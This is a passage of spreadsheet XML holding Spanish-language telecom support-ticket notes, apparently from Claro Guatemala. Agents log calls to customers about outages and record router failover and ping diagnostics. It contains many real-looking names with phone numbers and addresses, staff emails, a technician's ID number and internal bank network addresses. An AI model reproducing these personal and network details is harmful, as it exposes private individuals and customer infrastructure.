    <t>**SE LLAMA A CLIENTE ENCARGADO DE TIENDA AL 37600123 NO RESPONDE SE INTENTARA LUEGO **
-ID 2001496541
**</t>
  </si>
  <si>
    <t>F4618311</t>
  </si>
  <si>
    <t>SE HABLA CON ROBERT DUEÑAS, SE LE SOLICITA APOYO PARA VALIDAR SI CUENTAN CON UPS POR REINICIOS CONSTANTES, INFORMA QUE SI CUENTAN CON UPS PERO QUE AL NO TENER ENERGIA ENTRA LA PLANTA ELECTRICA A TRABAJAR PERO SIEMPRE SE REINICIAN LOS EQUIPOS, PERO SOLICITA QUE SE LLAME NUEVAMENTE PARA VALIDAR SI NO HAY ALGUN OTRO INCONVENIENTE Y EL AVERIGUARA, SE PROCEDERA EN 40 MINUTOS
ID
2001600498
COLA:
NOMBRE: A: 0050378390806
NÚMERO: 0050378390806
DURACIÓN: 0:01:32
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050378390806
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 27/06/2022 17:04:37</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ROBERT DUEÑAS SEGUN LO ACORDADO PERO NO SE TIENE RESPUESTA
ID
2001611745
COLA:
NOMBRE: A: 0050378390806
NÚMERO: 0050378390806
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050378390806
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 27/06/2022 17:49:10</t>
  </si>
  <si>
    <t>F4618317</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 31377777 CONTESTA EL SEÑOR BYRON MARTINEZ QUIEN BRINDA LOS SIGUIENTES DATOS PARA LA VISITA**
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS:SOLO IDENTIFICADOS
DIRECCCION: FRENTE A LA CLÍNICA MÉDICA Y FARMACIA LINDA VICTORIA HUEHUETENANGO
ATENDERA EN SITIO:BYRON MARTINEZ
-ID 2001439419
**</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO EMILIANDO SE VALIDA QUE ES NECESARIO CAMBIAR EL EQUIPO YA QUE INTERFACE CELULAR NO LEVANTA, CLIENTE MARIO MARTINEZ COMENTA QUE SE RETIRA DE LAS INSTALACIONES POR LO QUE SE PROGRAMA VISITA PARA LAS 8:00 AM DEL DIA DE MAÑANA, FALLA SE PASA A PC
2001803509
COLA:
NOMBRE: A: 58590398
NÚMERO: 58590398
DURACIÓN: 0:04:53
ESTADO: CONECTADA
DETALLES: 58590398
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 28/06/2022 16:25:27</t>
  </si>
  <si>
    <t>F4618321</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY VERGANZA 30192528 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001440639</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY VERGANZA 30192528 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001431693 - 2001431934</t>
  </si>
  <si>
    <t>F4618323</t>
  </si>
  <si>
    <t>SELLAMA A CLIENTE RICARDO - 54827944 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001445614</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK MONTEJO 58064113 - 46990218 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO  ||  RICARDO - 54827944
-ID 2001443704 - 2001443922</t>
  </si>
  <si>
    <t>F4618325</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO TEJADA 42271739 MENCIONA QUE NO HAY ENERGIA EN PR
-ID 2001446512</t>
  </si>
  <si>
    <t>F4618327</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO TEJADA 42271739 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001447404</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE FERNANDO TEJADA 42271739 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001453649 - 2001454524</t>
  </si>
  <si>
    <t>F4618332</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALVARO GARCIA 50900808 NO RESPONDE, ENVIA A BUZON
-ID 2001448990</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO GARCIA 50900808   PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001442045 - 2001442275</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ALVARO GARCIA 50900808 SE SOLICITAN DATOS PARA LA VISITA **
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCCION: KM.61 CARR INTERAMERICANA ALDEA EL CUNTIC, MUNICIPIO DE ZARAGOZA
ATENDERA EN SITIO: ALVARO GARCIA
-ID 2001469772
**</t>
  </si>
  <si>
    <t>F4618336</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE URIEL RAMIREZ 44895331 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001449810</t>
  </si>
  <si>
    <t>F4618339</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER RIOS 55144061 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001452383</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WALTER RIOS 55144061 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001456081</t>
  </si>
  <si>
    <t>F4618342</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS 58064113 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001455223</t>
  </si>
  <si>
    <t>F4618344</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DEEMI PINEDA 79336538 MENCIONA QUE EL INCONVENIENTE ES CON 2 PC CLIENTE CONFIRMA QUE CON UNA PC SI LOGRAN TENER ACCESO, SE LE CONFIRMA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001456872</t>
  </si>
  <si>
    <t>F4618345</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN HERRERA 36894258 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001224214</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA EN MONITOREO PARA MAÑANA A LAS 16:00 HORAS.</t>
  </si>
  <si>
    <t>F4618346</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DENIS GARCIA 37301123 MENCIONA QUE YA NO PERTENECE A LA EMPRESA DESDE ENERO PERO AMABLEMENTE BRINDA UN CONTACTO ESAU GONZALEZ - 48473863
-ID 2001462136</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WALTER RESYES PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001463938</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 79465311 PERO SUENA DESCONECTADO, SE VALIDARA OTRO CONTACTO CON LA CENTRAL
-ID 2001463705</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESAU GONZALEZ - 48473863 PERO NO RESPONDE
-ID 2001463185</t>
  </si>
  <si>
    <t>F4618347</t>
  </si>
  <si>
    <t>-* SE HABLA CON DANIEL RAMIREZ (CLIENTE) COMENTA QUE ESTA EN SITIO, SE REALIZA CONFERNCIA CON YENSI CALGUA (GESTORA) PARA VALIDACIONES Y/O PRUEBAS EN PR -*
-*</t>
  </si>
  <si>
    <t>F4618351</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LORENA ROSA 99011548 IVR INDICA QUE EL NUMERO ESTA PENDIENTE DE INSTALACION
-ID 2001479503
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LORENA ROSA 99011548 IVR INDICA QUE EL NUMERO ESTA PENDIENTE DE INSTALACION
-ID 2001465825</t>
  </si>
  <si>
    <t>F4618364</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER AGUILAR 79897813 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001467472</t>
  </si>
  <si>
    <t>F4618370</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER AGUILAR 79897813 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001523132 - 2001523328</t>
  </si>
  <si>
    <t>F4618378</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIANA RAMIREZ 48689140 - 51581821 PARA BRINDAR RETROALIMENTACION
-ID 2001471379 - 2001471634</t>
  </si>
  <si>
    <t>F4618388</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JOSE MIGUEL 78299319 , SOLICITA SE LE LLAME EN 5 MINUTOS YA QUE ESTÁ EN UNA VIDEOLLAMADA. 2001462869</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE JOSE MIGUEL 78299319, APOYA UBICANDO EQUIPO ETX-1 ALARMADO. APOYA REINICIANDOLO PERO CONTINUA EN EL MISMO ESTADO. APOYA TAMBIÉN REINCIANDO PBX PANASONIC. SE ABRIRA WO PARA LA REVISIÓN. ID DE LLAMADA: 2001466422</t>
  </si>
  <si>
    <t>F4618392</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANGÉLICA SARMIENTO 76013184 RESPONDE CLAUDIA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001473531</t>
  </si>
  <si>
    <t>F4618399</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIANA BONILLA AL 57029412 INDICA QUE AUN NO TIENE SEÑAL || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON ELLA **
-ID 2001456206
**</t>
  </si>
  <si>
    <t>F4618408</t>
  </si>
  <si>
    <t>CLEITNE NOS INDICA QUE NOS AVOQUEMOS A 33121467   EBBER LOPEZ ##</t>
  </si>
  <si>
    <t>EBBER LOPEZ - 33121467--- ### SE LLAMAA C LIENTE ### INDICA QUE AHORITA SE DESPLAZA HACIA DONDE TIENE LOS EQUIPOS + SE LE MARQUE EN 15 MINUTOS + SE LE BRINDA EL NUMERO DEL GESTOR + WHATTSAP POR SI REQUIERE APOYO ##
2001455028
COLA:
NOMBRE: A: 33121467
NÚMERO: 011 50233121467
DURACIÓN: 0:04:04
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50233121467
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 09:56:39</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE ##  EBBER LOPEZ - 33121467--- ### SE PASA CASO A WORKING</t>
  </si>
  <si>
    <t>CIENTE INDICA QUE NO ESTA EN PUNTO REMOTO ##ESTA LOCALIZANDO A PERSONAL EN PR</t>
  </si>
  <si>
    <t>LUIS ARTURO PAREDES-41280052  ### SE TIENE EN LINEA ##
2001453470
COLA:
NOMBRE: A: 41280052
NÚMERO: 41280052
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 41280052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 09:47:26</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EBBER LOPEZ - 33121467 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001475073 - 2001475340</t>
  </si>
  <si>
    <t>F4618414</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER SARMIENTO 79882830 MENCIONA QUE PERSISTE EL INCONVENIENTE DE TENER RUIDO EN LAS LLAMADAS, SE TRATA DE INDICARLE A CLIENTE QUE LE DEVOLVERAN LA LLAMADA PERO CLIENTE YA NO RESPONDE
-ID 2001748239 - 2001750045</t>
  </si>
  <si>
    <t>F4618420</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ANIBAL GONZÁLEZ/CLIENTE; CONFIRMADO EL MEETING PARA LAS 22:00 HORAS DE HOY. HAY SEGUIMIENTO VÍA CORREO:
ASUNTO: RE: 8900829T || BANCO DE DESARROLLO RURAL, S.A. || SD1138906</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CENTRAL PERO NO SE TIENE RESPUESTA, SE INTENTARA LUEGO
-ID 2001815121</t>
  </si>
  <si>
    <t>INDICA ANIBAL GOZALEZ QUE SE DEJE EL TTK EN MONITOREO HASTA LAS 5:00 PM DE LA TARDE EL DIA DE MAÑANA. SE PROCEDE A DEJR EN MONITOREO POR SOLICITUD DEL CLIENTE</t>
  </si>
  <si>
    <t>SE CONMUTO EL TRAFICO A ZONA 11 CAMBIANDO LA PRIORIDAD DEL HSRP, CLIENTE ANIBAL GOZALEZ REALIZA PRUEBAS EXTENSAS LAS CUALES SON SATISFACTORIAS.
CC_BANRURAL_GT_AGENC(CONFIG-IF)#NO  STANDBY 200 PRIORITY 90
CC_BANRURAL_GT_AGENC(CONFIG-IF)#STANDBY 200 PRIORITY  120
CC_BANRURAL_GT_AGENCIA_0033#SHOW STANDBY GIGABITETHERNET 0/1 BRIEF
                     P INDICATES CONFIGURED TO PREEMPT.
                     |
INTERFACE   GRP  PRI P STATE   ACTIVE          STANDBY         VIRTUAL IP
GI0/1       200  120 P ACTIVE  LOCAL           10.160.235.156  10.160.235.150
CC_BANRURAL_GT_CENTRAL_3#SHOW STANDBY GIGABITETHERNET 0/1 BRIEF
                     P INDICATES CONFIGURED TO PREEMPT.
                     |
INTERFACE   GRP  PRI P STATE   ACTIVE          STANDBY         VIRTUAL IP
GI0/1       200  110 P STANDBY 10.160.235.153  LOCAL           10.160.235.150</t>
  </si>
  <si>
    <t>PRUEBAS DE QUE YA SE ENCUENTRA REALIZADO EL CAMBIO
CC_BANRURAL_GT_AGENCIA_0033#SHOW STANDBY GIGABITETHERNET 0/1 BRIEF
                     P INDICATES CONFIGURED TO PREEMPT.
                     |
INTERFACE   GRP  PRI P STATE   ACTIVE          STANDBY         VIRTUAL IP
GI0/1       200  120 P ACTIVE  LOCAL           10.160.235.156  10.160.235.150</t>
  </si>
  <si>
    <t>NO ESCONTRAMOS EN CONTACTO CON ANIBAL GONZALES  Y BRYAN POCASANGRE DE BANRURAL  JUAN CARLOS LOPEZ DE W.O., MI PERSONA Y KEVIN GUERRA DE CONSULTORIA. KEVIN REALIZA PRUEBAS CON ANIBAL Y PARA PODER REALZAR EL CAMBIO DE PRIORIDAD. PARA EL DESVIO DE TRAFICO.</t>
  </si>
  <si>
    <t>F4618430</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BLADIMIR SANTAY AL 44712992 - 77718769 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001462540 - 2001462768
**</t>
  </si>
  <si>
    <t>F4618433</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO GOMEZ 78060035 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001100142</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO GOMEZ 78060035 MENCIONA QUE NO HA PRESENTADO NINGUN PROBLEMA PERO SOLICITA LLAMADA PARA MAÑANA  A  LAS 10:00 HRS CONFIRMAR EL FUNCIONAMIENTO
-ID 3001005798</t>
  </si>
  <si>
    <t>F4618436</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618436
ID:  245700245T
IDENTIFICADOR DEL CLIENTE:  CC_FUNDGENESIS_GT_BARILLAS_064
UBICADO EN:  4 CALLE 0-60 ZONA 1 SANTA CRUZ BARILLAS, HUEHUETENANGO 15.804670 -91.314723
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4618443</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR  ESPINA 56928191 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001486340</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR  ESPINA 56928191 MENCIONA QUE NO HA PRESENTADO PROBLEMA
SE VALIDARA EL FUNCIONAMIENTO A LAS 14:30
-ID 2001528276</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR ESPINA 56928191 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001563451</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR  ESPINA 56928191  SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001558379</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OMAR  ESPINA AL 56928191  INDICA QUE SE LE LLAME EN 1 HR NUEVAMENTE YA QUE SE LE HABIA CAIDO NUEVAMENTE PERO HASTA AHORITA ESTA ESTABLE **
-ID 2001489470
**</t>
  </si>
  <si>
    <t>F4618444</t>
  </si>
  <si>
    <t>SE LLAMA A JUAN CARLOS SIERRA 58561202, SE LE SOLICITA APOYO PARA UBICAR EQUIPO AETHRA</t>
  </si>
  <si>
    <t>CLIENTE JUAN CARLOS SIERRA 58561202 VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 30008773
NÚMERO: 011 50230008773
INICIO: HOY, 11:01 A. M.
FIN: HOY, 11:13 A. M.
DURACIÓN: 12:00
ID DE LLAMADA: 2001481407</t>
  </si>
  <si>
    <t>CLIENTE APOYA UBICANDO PATCHCORD DESCONECTADO DEL HUAWEI ONT HACIA EL AETHRA, SE PROCEDE A CONECTAR Y YA SE TIENE RESPUESTA A NIVEL DE IP
&lt;GNCYGTVGN1T1E06B02EIM4&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX_ACCESO 10.174.146.3
  PING 10.174.146.3: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    ..........................................................................................................................................................................................................................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!......!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.146.3 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1244 PACKET(S) RECEIVED
    17.06% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/3/17 MS
&lt;GNCYGTVGN1T1E06B02EIM4&gt;
&lt;GNCYGTVGN1T1E06B02EIM4&gt;
&lt;GNCYGTVGN1T1E06B02EIM4&gt;DISP ARP ALL | IN 10.174.146.3
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
----------------------------------------------------------------------------------------
10.174.146.3    00D0-D648-4C79  4         D-0         VLANIF3737       IP_PBX_ACCESO
----------------------------------------------------------------------------------------
TOTAL:3548         DYNAMIC:2560       STATIC:0    INTERFACE:988    REMOTE:0
REDIRECT:0</t>
  </si>
  <si>
    <t>F4618453</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN ALBUREZ 58649305 QUIEN APOYA REINICIANDO LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE, CLIENTE SOLICITA VISITA TECNICA PORQUE DESDE EL VIERNES TIENEN PROBLEMA CON EL SERVICIO
-ID 2001480437
NOMBRE DEL CLIENTE: CENTRAL DE CREDITOS S.A.
UBICACIÓN:11 CALLE 7-64 ZONA 9
CONTACTO EN SITIO: KEVIN ALBUREZ - 58649305
HORARIO DE ATENCION:8:00 - 16:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4618457</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBE ALONZO  55550340 MENCIONA QUE ELLOS APLICARON REINICIO A LOS EQUIPOS
CLIENTE MENCIONA QUE EL SERVICIO HA ESTADO ESTABLE PERO POR MOMENTOS PRESENTA CAIDAS, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001487537</t>
  </si>
  <si>
    <t>F4618458</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 31443466 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001492402</t>
  </si>
  <si>
    <t>F4618464</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GISELA 96893594 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001494071 - 2001494331</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GISELA AL 96893594  SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON  CLIENTE **
-ID 2001515207
**</t>
  </si>
  <si>
    <t>F4618470</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR MEZA   22558500 EXT. 33313 IVR INDICA QUE LA LINEA NO EXISTE EN LA RED DEL OPERADOR DEL DESTINO
-ID 2001489898</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 11:29
PARA: VICTORMEZA@BANPRO.COM.NI &lt;VICTORMEZA@BANPRO.COM.NI&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CNOC.CLARONI &lt;CNOC.CLARONI@CLARO.COM.NI&gt;
ASUNTO: BANCO DE LA PRODUCCION S.A. || 605062ON || SD1138942 || F4618470
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4618483</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS BENAVIDES-77754712
2001468962
COLA:
NOMBRE: A: 0050377754712
NÚMERO: 0050377754712
DURACIÓN: 0:00:12
ESTADO: CONECTADA
DETALLES: 0050377754712
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 10:28:33</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE  LUIS BENAVIDES-77754712  ##INDICA QUE ESCALARA CASO A SU PROVEEDOR DE PBX, DEBIDO A QUE PLANTA TELFONICA NO PUEDE REGISTRARSE + A NIVEL INTERNO NO HAY CONECTIVIDAD##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LUIS BENAVIDES-77754712 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001529681</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS BENAVIDES-77754712 Y CONTESTA  SR ERICKSON ## INDICA QUE DEJARON EL TELEFONO, POR QUE ESTAN EN ALMUERZO Y SE LE LLAME A LAS 13 HORAS##
2001512133
COLA:
NOMBRE: A: 0050377754712
NÚMERO: 0050377754712
DURACIÓN: 0:01:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377754712
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 12:28:09</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE LUIS BENAVIDES-77754712 INDICA QUE PBX SE DESCONFIGURO Y ESTA CONFIGURANDOLA. COMENTA QUE EN UN MOMENTO EL SERVICIO RESTABLECIO PERO QUE TIENE PROBLEMAS CON DHCP. PIDE SE LE MARQUE EN 1 HORA##
2001488079
COLA:
NOMBRE: A: 0050377754712
NÚMERO: 0050377754712
DURACIÓN: 0:03:28
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377754712
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/06/2022 11:23:32</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE Y SE LE EXPXLICA QUE SU PBX NO SE ESTA REGISTRANDO ## CLIENTE INDICA QUE FORZARA EL REGISTRO Y PIDE SE LE MARQUE EN 30 MINUTOS ##</t>
  </si>
  <si>
    <t>F4618484</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN VELASQUEZ AL 25027202 CLIENTE INDICA QUE SI CUENTAN CON ENERGIA QUE HUBO UN APAGON PERO YA REGRESO LA ENERGIA INDICA QUE SE LE GESTIONE VISITA YA QUE EN EL LUGAR NO HAY NADIE AUTORIZADO EN PODER HACER PRUEBAS || SE NOTIFICA A GESTOR **
-ID 2001510832
**</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // QUEDAMOS A LA ESPERA DE LA RESPUESTA
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 14:06
PARA: OPERACIONES@AEROCLUBGUATEMALA.COM &lt;OPERACIONES@AEROCLUBGUATEMALA.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 345500006T | AEROCLUB DE GUATEMALA
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESTARA EN SITIO.
DIRECCIÓN:  INTERNET.- N15 4C 9 W88 56 1 RIO DULCE IZABAL
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
SERGIO DAVID CRUZ AGUILAR         1808327512002
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE ENVÍA NUEVAMENTE CORREO A CLIENTE, SOLCIITANDO EL INGRESO DE NUEVOS TÉCNICOS. //A LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 14:18
